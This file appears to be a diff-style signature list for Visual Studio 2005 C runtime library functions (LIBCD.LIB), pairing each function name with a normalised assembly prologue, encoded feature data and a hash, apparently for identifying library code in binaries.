+__atoldbl,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",4VTcJwAAAAAAAAAA,NRZyE2nNBgAAAAAAbUkFBl6jgydtSQUGnIZROJyGUThQ25n2Xp36xD7KhtkAAAAA0bKtvZyGUThpzQYAUNuZ9mKoXH4AAAAAbUkFBmnNBgBeo4MnbUkFBl6jgydtSQUGm0EHkzUWchO2oJo9ac0GAJyGUThpzQYAtB/fNhdP+qit/Rq5YqhcfgAAAAAAAAAAOsWmFF6jgycAAAAAac0GAJyGUTichlE4XqODJz7KhtkAAAAAac0GANGyrb2bQQeTnIZROGnNBgB7qn/hnIZROGKoXH4sk5c/e6p/4d/cdGYSm+oUrf0auRdP+qgAAAAALJOXP2KoXH4AAAAAXqODJ5yGUTgAAAAAnhVI05yGUTgAAAAAF0/6qJyGUThNKANJ39x0Zp4VSNPIUl/XTSgDSZyGUTgAAAAAtqCaPQAAAAAAAAAAnIZROIsNFExNKANJnIZROJyGUTjegR2vTSgDSYsNFEwAAAAA3oEdr2KoXH4AAAAAac0GAJ4VSNPIUl/XEpvqFJ4VSNPIUl/Xiw0UTIsNFEz0Ke4IyFJf16QXY28AAAAA9CnuCF6jgycAAAAAPsqG2W1JBQYAAAAAPsqG2aQXY28AAAAAiw0UTDrFphT0Ke4IbUkFBl6jgydtSQUGpBdjb7Qf3zZenfrE9CnuCF6jgycAAAAAwJexuG1JBQYAAAAA,7fc564890de1dae004b2e8c61ca496eadf4cb9df,VS2005,LIBCD.LIB
+__ZeroTail,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nAND R32,CONST\nADD R32,R32\nSAR R32,CONST",XqODJ9TZ7ssAAAAA1NnuyxPk2CUo2T2fE+TYJQAAAAAAAAAAxCjsushSX9cNzMABbd4K7QivG87EKOy6nIZROBPk2CUo2T2fCK8bzshSX9cNzMABKNk9n16jgycNzMABDczAAU+LzAoAAAAAyFJf15yGUTgAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAA,[],4dc99ecca3676d8e2823a0a91857ba9b120aff38,VS2005,LIBCD.LIB
+__ld12cvt,"MOV DWORD PTR SS:[EBP+CONST],0\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",9CnuCDUWchMAAAAA7HaGu0qIAMtZGXL9uHMDS/PdLQwAAAAA0skfifPdLQwAAAAAeKO/qgAAAAAAAAAASogAy0zPRE/SyR+Jfy58ktUc1LYAAAAAWRly/fPdLQwAAAAA1RzUtgAAAAAAAAAA890tDCnZq7B/LnySNbuOIex2hru4cwNLbWJdBTMqhK1lqKzx7cMNS/PdLQwAAAAAMyqErfCSAOk1u44h8JIA6ex2hru4cwNLZais8e3DDUv0Ke4IKdmrsNUc1LZ4o7+qTM9ETynZq7B/LnySNRZyE/PdLQwAAAAA,[],2ca6741c39560baee9c003287832859ab981efd7,VS2005,LIBCD.LIB
+__atoflt,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",4VTcJwAAAAAAAAAA,nIZROGKoXH4sk5c/m0EHkzUWchO2oJo9e6p/4ef4xGBcjBtorf0auRdP+qgAAAAALJOXP2KoXH4AAAAAXqODJ5yGUTgAAAAAYqhcfgAAAAAAAAAAOsWmFF6jgycAAAAAF0/6qJyGUThNKANJ5/jEYGnNBgAAAAAATSgDSZyGUTgAAAAAtqCaPQAAAAAAAAAAnIZROIsNFExNKANJnIZROJyGUTjegR2vTSgDSYsNFEwAAAAA3oEdr2KoXH4AAAAAac0GAJ4VSNPIUl/Xiw0UTIsNFEz0Ke4InhVI05yGUTgAAAAAyFJf16QXY28AAAAA9CnuCF6jgycAAAAA09p6H16jgydtSQUGPsqG2aQXY28AAAAAiw0UTDrFphT0Ke4IbUkFBl6jgydtSQUGXIwbaOf4xGAAAAAApBdjb7Qf3zZenfrE9CnuCF6jgycAAAAAwJexuG1JBQYAAAAANRZyE2nNBgAAAAAAbUkFBl6jgydtSQUGnIZROJyGUThQ25n2Xp36xD7KhtkAAAAA0bKtvZyGUThpzQYAUNuZ9mKoXH4AAAAAbUkFBl6jgydtSQUGbUkFBmnNBgBeo4MntB/fNhdP+qit/Rq5ac0GAJyGUTichlE4XqODJ9Paeh8AAAAAac0GANGyrb2bQQeTac0GAJyGUThpzQYAnIZROGnNBgB7qn/h,afa6bdced6d856a6bfde03469e12f4fe9c8902a7,VS2005,LIBCD.LIB
+__ShrMan,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nAND R32,CONST\nADD R32,R32",PsqG2ZyGUTgAAAAAPsqG2ZyGUTgAAAAAnIZROPQp7gizlysEXqODJz7KhtkAAAAAnIZROC+iRdWDrkNes5crBD7KhtkAAAAAekl96V6jgycAAAAAg65DXnpJfem2p9eJtqfXiV6jgycAAAAAaCh+kyRoZLkAAAAAshSxNyRoZLloKH6T9CnuCJyGUTgAAAAAJGhkuZyGUTgAAAAAL6JF1QAAAAAAAAAA,[],93c12bab7df30be20fac7fabaa07ab6183141c58,VS2005,LIBCD.LIB
+__CopyMan,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0",avyCNj7KhtkAAAAAPsqG2ZyGUTgAAAAAnIZROE+LzApq/II2T4vMCgAAAAAAAAAAjovAMJyGUTgAAAAA,[],9ac9e5ead86a8a0dab32ddda632ae04364caaed1,VS2005,LIBCD.LIB
+__IsZeroMan,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],0\nJMP SHORT CONST",XqODJz7KhtkAAAAAPsqG2ZyGUTgAAAAAKrNC3k+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROCqzQt4o2T2fKNk9n16jgycNzMABojkvFZyGUTgAAAAADczAAU+LzAoAAAAA,[],7e8f2bf086bc53f51d9f120140bbf5a327c80861,VS2005,LIBCD.LIB
+__IncMan,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nAND R32,CONST\nADD R32,R32\nSAR R32,CONST",nIZRONUc1LachlE4nIZRONUc1LZcb9e9XG/XvT7KhtkAAAAAjqC0kpyGUTgAAAAAbd4K7S5oRgCOoLSS1RzUtgAAAAAAAAAALmhGAJyGUTgAAAAAPsqG2ZyGUTgAAAAA,[],5f0a51f152084bafa3fc37556d50fbf1bb4ae320,VS2005,LIBCD.LIB
+__RoundMan,"DEC R32\nOR R32,CONST\nINC R32\nMOV R32,CONST\nSUB R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",A0VqbpyGUTgAAAAA1RzUtgAAAAAAAAAA1Nnuy9Uc1LbWZLQVSXNBuANFam7TtQaErBYCxANFam5Jc0G407UGhJyGUTgAAAAApOo8ngNFam5Jc0G4nIZRONUc1LbWZLQVXBbr8aTqPJ6sFgLE1mS0FdTZ7ssAAAAA,[],983e6cf1c9f1893acdc4ab583fa1d45a45c092d4,VS2005,LIBCD.LIB
+__frnd,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFRNDINT",d7Ne/gAAAAAAAAAA,[],cfe308bf2474d945ff916e867c1f03c66a2655dd,VS2005,LIBCD.LIB
+__mbctokata,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",L7ATP9iy05k+yobZPsqG2diy05kAAAAAZwXcJdiy05kvsBM/2LLTmQAAAAAAAAAA,[],3570ef3c1992715759a6a51b865114596d2aa5d5,VS2005,LIBCD.LIB
+___initconout,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST",HtIz9wAAAAAAAAAA,[],f5e7866b938dc7afdd14356b26cf449b27be58cf,VS2005,LIBCD.LIB
+___initconin,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST",HtIz9wAAAAAAAAAA,[],1efa1592e3f91e42604c17e887418abcabf81f65,VS2005,LIBCD.LIB
+___termcon,"MOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",JAPDnQDh1msjrvAsJAPDnSQDw52AJe6YI67wLAAAAAAAAAAAgCXumADh1mskA8OdOWijNCQDw50kA8OdAOHWawAAAAAAAAAAJAPDnQDh1mskA8Od,[],3eaa2e3ade29f6213c668f4132297b24de36c89a,VS2005,LIBCD.LIB
+__wtempnam,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",Gu9lDpyGUTgAAAAAlnPwX5yGUTgAAAAAjwpx1eA8Ezipw6YPnIZROJyGUThPq8wcnIZROJ0eNGKX4JCxT6vMHJyGUTi9np4Zl+CQsZ0eNGIAAAAA6H4nTJyGUTix9uXynR40YjUWchOftcF8qcOmDwP8GHoAAAAAvZ6eGZyGUThxWpQ6nIZROKGvo7SNqU/q4DwTOI8KcdUkA8OdcVqUOpyGUTgAAAAAjalP6qGvo7QAAAAAn7XBfOWABPg1FnITnIZROM6NkPG9np4ZBoJUlJyGUTi9np4ZvZ6eGZyGUTjOjZDxoa+jtHCc4w0+U6QMNRZyEwP8GHoAAAAAsfbl8pyGUTgAAAAAzo2Q8ZZz8F/0Ke4I5YAE+JyGUTjofidMJAPDnY8KcdUD/Bh6A/wYegAAAAAAAAAAPlOkDOA8Ezipw6YPvZ6eGZyGUTga72UOcJzjDeA8Ezipw6YP9CnuCJyGUTgAAAAA,[],a6d4e235d89533101cf88e3b55aff9003b2d143c,VS2005,LIBCD.LIB
+_atan,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nJCC CONST",86J8nYp8rQWKfK0Fe0YRIAAAAAAAAAAAgXJ9eYp8rQWKfK0FN9QtU9FIlKUAAAAAAFkkeehVq9qc7n8w0UiUpYp8rQWKfK0FsXXuR9FIlKUAAAAA6FWr2jfULVPNLBGm0UiUpXtGESB7RhEgzSwRpjfULVMpBN3cinytBTfULVMAAAAAnO5/MIFyfXnzonydKQTd3NFIlKWxde5H,[],ea1f3294b9a0f66827ab20fed72be85dc206da6f,VS2005,LIBCD.LIB
+__CIatan,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,AaF1swAAAAAAAAAAdqHX0LygXegBoXWzvKBd6AAAAAAAAAAA,a3422235a239ce30b8e613233f31cd5d143f3fa7,VS2005,LIBCD.LIB
+__aullshr,"MOV R32,R32\nXOR R32,R32\nAND R8,CONST\nSHR R32,R8\nRETN",xHSwTwAAAAAAAAAA5EobvwAAAAAAAAAAW9AV4ORKG7+Nl+q/jZfqvwAAAAAAAAAAW9AV4MR0sE9b0BXg,[],7abc6021d09ea11c9df07eae3fd3a0afa9546f5b,VS2005,LIBCD.LIB
+___onexitinit,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nPOP EBP",jCrKm9Rc98B0m14ZdJteGQAAAAAAAAAA1Fz3wAAAAAAAAAAA,[],f74ece45753db7851bb5a0a4363f35c07e72342a,VS2005,LIBCD.LIB
+__onexit,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST",T4vMCgAAAAAAAAAADwAW9k+LzAoAAAAAndYys4ActmYNzMAB8VETFw8AFvad1jKzgBy2Zk+LzAoAAAAADczAAU+LzAoAAAAA,[],21afb06bf1f7cc2d80769fa6bc8fcabb73fd1573,VS2005,LIBCD.LIB
+_atexit,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nNEG R32\nSBB R32,R32",vNwG2QAAAAAAAAAA,gBy2Zk+LzAoAAAAADczAAU+LzAoAAAAA8VETFw8AFvad1jKzDwAW9k+LzAoAAAAAndYys4ActmYNzMABT4vMCgAAAAAAAAAA,948a6933621450cf96dfd3918307905ce95de2da,VS2005,LIBCD.LIB
+___crtLCMapStringW,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],CONST",0UiUpSbu4WWchlE4oDc6oTEuOrEAAAAAJu7hZTEuOrEAAAAAcVqUOsRvvmMAAAAAMS46sQAAAAAAAAAAnIZROD73NQ1meTE1CDWcYWZ5MTUZpmb/nIZRODeRrHwJ4Qex+Hf5wcRvvmMAAAAAZnkxNTEuOrEAAAAACeEHsefdfUtmeTE1xG++Y16jgycAAAAAPvc1DX7DuDdmeTE1N5GsfOfdfUtmeTE1GaZm/5yGUTgAAAAAGaZm/5yGUTgAAAAAXqODJ6A3OqEAAAAAnIZROIrfhOlCkTW2nIZROAVqmzlmeTE1QpE1tl6jgycNzMABZnkxNTEuOrEAAAAALaOCjZyGUTgINZxhZnkxNTEuOrEAAAAAnIZROCQDw5068AAFBWqbOVJnfwZmeTE1ZnkxNTEuOrEAAAAAOvAABdFIlKUkPsFMZnkxNTEuOrEAAAAAfsO4N+fdfUtmeTE15919S5yGUTgAAAAADczAATEuOrEAAAAAJAPDndFIlKUkPsFMXqODJ6A3OqEAAAAAit+E6aA3OqENzMABJD7BTDEuOrEAAAAAZnkxNTEuOrEAAAAACDWcYQg1nGEZpmb/Umd/BpyGUTiKdwyYZnkxNTEuOrEAAAAA5919S5yGUTgAAAAAincMmF6jgyeDrkNeDczAATEuOrEAAAAAg65DXvh3+cFxWpQ6,[],e024f4862d920e0ef36c0b4c61ee5c3e6faea358,VS2005,LIBCD.LIB
+__matherr,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nPOP EBP\nRETN",F0UAEQAAAAAAAAAA,[],a737d8b8f0a0c3ab192f3887d4e523ede59957cb,VS2005,LIBCD.LIB
+__spawnlp,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",JOIozQAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vl5FK8n6QXY28k4ijNnIZROORSvJ+S9NEBrKbWTpyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vldYMGr6QXY28k4ijNpBdjb+RSvJ+S9NEBkvTRAeRSvJ91gwav,[],24969fd5fc0f78df478771ac07f5c1b9b2131b62,VS2005,LIBCD.LIB
+__setjmp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[R32],EBP\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],ESP\nMOV R32,DWORD PTR SS:[ESP]\nMOV DWORD PTR DS:[R32+CONST],R32",Us42lQAAAAAAAAAA9CnuCFLONpUAAAAA+Hf5wVLONpUAAAAA3qQmM/h3+cH0Ke4I,[],a0d78119d133264c0b09b30f37db1336c93e4e96,VS2005,LIBCD.LIB
+___loctotime_t,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",iw0UTHA0JWevJ1dckRRgaE+LzAoAAAAAnIZROEFF0BskA8OdnIZROJ1SM7gPKqX5uKvYjK8nV1yLDRRMJAPDnUFF0BsAtygyDyql+ZEUYGichlE4QUXQG0+LzAoAAAAAcDQlZ51SM7ichlE4T4vMCgAAAAAAAAAAALcoMkFF0BuRFGBonVIzuJEUYGichlE4rydXXE+LzAoAAAAA,[],5bef05fc7919f8967ba1a9b8994269d1916ab2b6,VS2005,LIBCD.LIB
+__fFCOS,INT3\nINT3\nINT3\nFSIN\nWAIT\nFSTSW R16\nWAIT\nSAHF,AaF1swAAAAAAAAAAVF5d/fjrCHavkuR4qj2zbwAAAAAAAAAASAcB8fq8SsIAAAAA01sr0UgHAfEBoXWzSAcB8WKYTl4AAAAA+OsIdgAAAAAAAAAAAaF1swAAAAAAAAAA+rxKwkgHAfEBoXWzr5LkeAAAAAAAAAAAYphOXlReXf2qPbNv,[],28e6c65c88fcf6a4d434ae6a577d030fbeb197d9,VS2005,LIBCD.LIB
+__fFSIN,FSIN\nWAIT\nFSTSW R16\nWAIT\nSAHF\nJCC CONST,AaF1swAAAAAAAAAAVF5d/fjrCHavkuR4qj2zbwAAAAAAAAAAr5LkeAAAAAAAAAAASAcB8WKYTl4AAAAA+OsIdgAAAAAAAAAA01sr0UgHAfEBoXWzYphOXlReXf2qPbNv,[],8079b8274fd0b4d0fa0b4408a88211a89a2b4160,VS2005,LIBCD.LIB
+__wcenvarg,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]\nLEA R32,DWORD PTR DS:[R32+R32*2]\nPUSH R32",MIUL5vQp7givJ1dcMCgAEIOuQ14AAAAAiAKgkjqNu5deo4Mn9WNwf+QpqGY8PRYWwEo1uU+LzAoAAAAATJ60eIYlmbdEJbklnIZROMWN7OlKiADLrydXXE+LzAoAAAAASogAy6kgp2WJJT2AbHlVFJyGUTj/qlAKPD0WFuQpqGY8PRYWT4vMCgAAAAAAAAAA9CnuCF0GNoUAAAAAnIZRODqNu5dUwZr8iSU9gAAAAAAAAAAAg65DXoYlmbdEJbklPD0WFuQpqGZ3k10KRCW5JYOuQ14AAAAAqSCnZQAAAAAAAAAANoiE/E+LzAoAAAAAVMGa/IOuQ14AAAAAlFhQ7PV1By9eo4MnxY3s6QAAAAAAAAAAg65DXp0xXyJeo4Mnd5NdCt++NfgAAAAAiAKgkp0xXyJeo4MnXQY2hfV1By+UWFDsXqODJ4gCoJIAAAAAnTFfIpyGUTg2iIT8qgEoOkyetHjIUl/XyFJf14OuQ14AAAAAg65DXpyGUTj/qlAKg65DXjqNu5deo4Mn/6pQCoOuQ14AAAAAJAPDnfQp7ggwhQvmGk7v4KoBKDoAAAAAXqODJ4gCoJIAAAAAOo27lyQDw50aTu/g5CmoZqoBKDrASjW5EkOaOfV1By+UWFDsXqODJxJDmjkAAAAA9XUHL+QpqGb1Y3B/3741+OQpqGb1Y3B/hiWZt5yGUThseVUU,[],ffb649be44dbad955389dc162f311c7396363bab,VS2005,LIBCD.LIB
+__setmaxstdio,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV R32,DWORD PTR DS:[R32+R32*4]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",iw0UTO6IrP6vJ1dcrydXXE+LzAoAAAAAlnPwXzUWchMAAAAA7ois/u6IrP6JPj8o9CnuCJyGUTgAAAAA7ois/rt5NzcdKQyuXqODJwmX7pwAAAAAiT4/KJZz8F92nP2anIZROEFF0BsKk5jZHSkMrkFF0BsAAAAACpOY2ZZz8F+3NfyJu3k3N4OuQ14AAAAACZfunJyGUThNJfkBdpz9moOuQ14AAAAAtzX8iUFF0BsAAAAAg65DXpyGUThNJfkBCZfunL9VJKrWZLQVTSX5AV6jgycbfI4eg65DXr9VJKrWZLQVlnPwX0FF0BsAAAAA1mS0FQmX7pwAAAAAG3yOHvQp7gjpLS2KQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAv1UkqjUWchMAAAAAVaatKK8nV1yLDRRM6S0til6jgycAAAAANRZyE0FF0BsAAAAA,[],cff5da31f9160b39c638802cad3d14c4c471f8e4,VS2005,LIBCD.LIB
+__getmaxstdio,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nPOP EBP\nRETN",YAM74QAAAAAAAAAA,[],6e458b0ca597f920bfca5c36b00650c66ccface6,VS2005,LIBCD.LIB
+__CIasin,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,vKBd6AAAAAAAAAAAAaF1swAAAAAAAAAAdqHX0LygXegBoXWz,6cdf2d7fc5f86ec692fc42d5b7065c57cd45ccfb,VS2005,LIBCD.LIB
+_asin,"FLD1\nFADD ST,ST(1)\nFLD1\nFSUB ST,ST(2)\nFMULP ST(1),ST\nFSQRT\nFPATAN\nCMP DWORD PTR DS:[0],0",kOKhEXtGESB7RhEgG+RQKYp8rQWKfK0FIYd5Y5DioRHwEJlenO5/MOhVq9rI1XvE8BCZXpDioRGa+uLm0UiUpYp8rQWKfK0FN9QtU9FIlKUAAAAA0UiUpXtGESB7RhEgyNV7xCGHeWMb5FAp6FWr2jfULVPNLBGminytBSGHeWMAAAAAAFkkeehVq9qc7n8w6FWr2iGHeWMb5FApzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAAmvri5tFIlKWxde5HsXXuR9FIlKUAAAAA,[],c327768c097b0d2c2fddb3479e85753d5eb67750,VS2005,LIBCD.LIB
+__fstat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",n5wfPEFF0BsAAAAA2MX2RCaeBgSfnB88Ak27KdjF9kSchlE4HI4dbUFF0BsAAAAAnIZROByOHW0uo/JZJp4GBJyGUTgAAAAA2MX2RJ+cHzzYxfZEn5wfPEFF0BsAAAAAHI4dbUFF0BsAAAAAJp4GBFf72qUAAAAADpXpTCV/t5Kwv4r/QUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAac0GAJyGUTichlE4sL+K/9jF9kQAAAAA7x/Wlx4YujkGYojDH2deBmjnSdm8OPIqnIZRONVZPA2/dwbPeghuPw6V6Uwcjh1tv3cGz3cyIRUAAAAAJX+3kp+cHzzYxfZEqJRtszUWchMAAAAA1Vk8DR9nXgaolG2zBmKIw1iFkXceGLo5LqPyWUFF0BsAAAAAdzIhFR9nXgaolG2znIZROBuWIZjYxfZEG5YhmNjF9kSchlE4WIWRd3oIbj+chlE42MX2RJ+cHzzYxfZEnIZRONjF9kSchlE4Hhi6OU+LzAoAAAAA2MX2RAJNuymfnB88nIZROJyGUThpzQYAnIZROIBKZVnYxfZEgEplWVf72qUAAAAA2MX2RCaeBgSfnB88vDjyKjUWchMAAAAA2MX2RJ+cHzzYxfZEaOdJ2TUWchMAAAAAV/vapUFF0BsAAAAAn5wfPEFF0BsAAAAANRZyE0FF0BsAAAAA,[],1dac9cff8cedfed5dcfb47bd4fb0d9ecf61c7359,VS2005,LIBCD.LIB
+__heap_term,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0\nJMP SHORT CONST",2fjP/VKlaoQAAAAAvxhzqAAAAAAAAAAA7ois/r8Yc6jZ+M/9dSEOse6IrP4AAAAAUqVqhL8Yc6jZ+M/9,[],86cffef870bfe04c4236aade11151d4a6aab1c11,VS2005,LIBCD.LIB
+__heap_init,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nXOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],0\nSETE R8\nPUSH R32",KrNC3gDh1msAAAAADczAAQDh1msAAAAAAOHWawAAAAAAAAAAUmjqWyqzQt5LoApZS6AKWQDh1msAAAAAZ/35RFJo6lsNzMAB,[],dce622608d29a5cb0f335ce1c7c065f68957065b,VS2005,LIBCD.LIB
+__waccess,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",T4vMCgAAAAAAAAAAgxGsXE+LzAoAAAAAcnVwhA6V6UxHgKQ5DpXpTOq2imwOlelMDpXpTOq2imyDEaxcR4CkOU+LzAoAAAAA6raKbAAAAAAAAAAA,[],8d5631004e30579474334ef90afc7556517d9a22,VS2005,LIBCD.LIB
+__mkgmtime,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP",FGPB2wAAAAAAAAAA,nIZRONTZ7suchlE4NRZyEySjmVwAAAAANRZyEySjmVwAAAAAnIZROJyGUTichlE4JKOZXEPTkW0AAAAAnIZRONTZ7suchlE4nIZRODUWchOLDRRMQ9ORbQAAAAAAAAAAnIZRODUWchOchlE4nIZRONTZ7ss1FnITiw0UTHA0JWc1FnITnIZRONTZ7suchlE4NRZyEySjmVwAAAAANRZyEySjmVwAAAAA1Nnuy5Zz8F+bAlEAcDQlZyBAyDQp2auwiw0UTCnZq7A1FnITrM6XGDUWchOLDRRMXqODJySjmVwAAAAAKdmrsAEfpBcp2auwNRZyEySjmVwAAAAAmwJRAJyGUTgAAAAA1Nnuy5Zz8F+bAlEA7HAQGhdxje1eo4MnKdmrsA7ZDZsp2auw1NnuyzqNu5ebAlEAKdmrsF6jgycp2auwnIZROAG1SIo1FnITmwJRAJyGUTgAAAAAKdmrsCBAyDRCAu3/KdmrsF6jgycBH6QXNRZyEySjmVwAAAAAlnPwX5yGUTgAAAAADtkNm5yGUTiwp3FNQgLt/5yGUTichlE4AR+kF16jgycAAAAAnIZROLUuiV41FnITnIZRONTZ7suchlE4IEDINJyGUTichlE4KdmrsHA0JWcO2Q2blnPwX5yGUTgAAAAAtS6JXpyGUTichlE4NRZyEySjmVwAAAAAnIZROLUuiV41FnITnIZROJyGUTichlE4NRZyEySjmVwAAAAAnIZRODUWchOchlE4XqODJxdxje0AAAAAtS6JXpyGUTichlE4nIZRODUWchOchlE4nIZROJyGUTichlE4nIZROJyGUTichlE4nIZROJyGUTichlE4nIZRONTZ7ss1FnITAbVIipyGUTichlE4nIZRODUWchOchlE4nIZROJyGUTg1FnITnIZRONTZ7ss1FnITsKdxTZyGUTgAAAAAnIZRONTZ7suchlE4XqODJySjmVwAAAAAnIZRONTZ7suchlE4F3GN7UPTkW0AAAAAnIZROJyGUTichlE4nIZROOxwEBrFdAy6NRZyEySjmVwAAAAAmwJRAJyGUTgAAAAAxXQMuinZq7Beo4MnOo27lwG1SIo1FnIT,68f8e11df6fc3df1853f7b89d9a68476c8ff8ee7,VS2005,LIBCD.LIB
+_mktime,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP",FGPB2wAAAAAAAAAA,nIZROJyGUTichlE4nIZROJyGUTichlE4NRZyEySjmVwAAAAAnIZRODUWchOchlE4nIZROJyGUTg1FnITlPajQTUWchOLDRRMnIZRONTZ7suchlE4XqODJySjmVwAAAAAF3GN7UPTkW0AAAAAnIZROJyGUTichlE4nIZROOxwEBrFdAy6nIZRODUWchOchlE4xXQMuinZq7Beo4MnnIZRONTZ7suchlE4NRZyEySjmVwAAAAAAbVIipyGUTichlE4rM6XGDUWchOLDRRMnIZRONTZ7suchlE4nIZRODUWchOLDRRMQ9ORbQAAAAAAAAAAnIZRONTZ7ss1FnITnIZRODUWchOchlE4nIZRONTZ7ss1FnITiw0UTHA0JWc1FnITnIZRONTZ7suchlE4nIZRONTZ7suchlE4NRZyEySjmVwAAAAANRZyEySjmVwAAAAA1Nnuy5Zz8F+bAlEAlnPwX5yGUTgAAAAAcDQlZyBAyDQp2auwiw0UTCnZq7A1FnITmwJRAJyGUTgAAAAAnIZRONTZ7ss1FnITJKOZXEPTkW0AAAAAXqODJySjmVwAAAAAKdmrsAEfpBcp2auwNRZyEySjmVwAAAAAmwJRAJyGUTgAAAAA1NnuyzqNu5ebAlEAKdmrsA7ZDZsp2auwKdmrsF6jgycp2auwnIZROAG1SIo1FnITKdm